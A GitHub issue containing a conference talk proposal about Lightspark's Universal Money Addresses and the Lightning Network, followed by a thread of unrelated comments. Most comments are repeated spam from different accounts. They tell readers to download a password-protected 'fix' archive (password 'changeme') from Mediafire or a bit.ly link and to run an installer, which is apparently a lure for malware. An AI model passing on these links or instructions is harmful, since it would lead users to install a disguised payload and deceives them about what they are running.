### ISSUE TITLE
Lightspark UMA Talk

### ISSUE THREAD

**Issue by shreyav** [TABConf/6.tabconf.com#103]
# Description
### What is this talk about? Give us as many details as possible. 

This talk will dive deep into Universal Money Addresses (UMA), a groundbreaking innovation that aims to simplify and universalize the process of sending and receiving money across the globe, regardless of currency. UMA acts like an email address for money, allowing users to send and receive both fiat and cryptocurrency seamlessly 24/7 through their preferred UMA-enabled platforms, such as wallets, exchanges, or banks.

The session will explore the fundamental principles behind UMA, including its open-source nature, how it leverages the Bitcoin Lightning Network for fast, low-cost transactions, and the potential it holds to revolutionize global payments. We will also discuss the technological infrastructure that makes UMA possible, the user experience benefits, and how UMA is set to transform traditional and Web3 financial systems by enabling interoperability across various financial platforms.

### What would an attendee learn from this talk?

Attendees will gain insights into:
* **What is UMA?**: Understanding the concept and function of a Universal Money Address.
* **Global Payment Challenges**: How UMA addresses the most pressing issues in global payments, including speed, cost, and accessibility.
* **Technological Foundations**: The underlying technology that powers UMA, particularly the use of the Bitcoin Lightning Network.
* **User Experience**: How UMA simplifies the user experience by abstracting away the complexities of cryptocurrency transactions.
* **Future Impacts**: The potential for UMA to change the landscape of both traditional finance and the Web3 ecosystem.
* **Real-World Applications**: How UMA can be applied in various scenarios, from everyday transactions to complex financial operations.

### Is there anything folks should read up on before they attend this talk?

This talk is designed to be accessible to both beginners and those with a basic understanding of global payments and blockchain technology. No prior reading is necessary, but for those who wish to come prepared with questions or a deeper understanding, the following resources are recommended:
* Overview of Bitcoin Lightning Network and its capabilities.
* General principles of open-source software and its impact on financial systems.
* Basic concepts of cryptocurrency wallets, exchanges, and digital banking.

### Relevant Links

* [UMA Overview](https://docs.uma.me/uma-standard/introduction)
* [Lightspark Overview](https://docs.lightspark.com/)
* [Bitcoin Lightning Network](https://lightning.network/)

# About the Speaker
Shreya Vissamsetti is a developer working on the Universal Money Address (UMA) protocol. Her work involves creating new payment experiences that leverage the UMA technology's capabilities.

### Social Links
[GitHub](https://github.com/shreyav)
[LinkedIn](https://www.linkedin.com/in/shreya-vissamsetti/)

# Talk Details
### Length of Talk
30 minutes with a 10 minute Q&A session

### Preferred Day/Time Slot 
No preference

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by horologger** [comment]
Personally quite interested in this topic.  Here's an upvote.
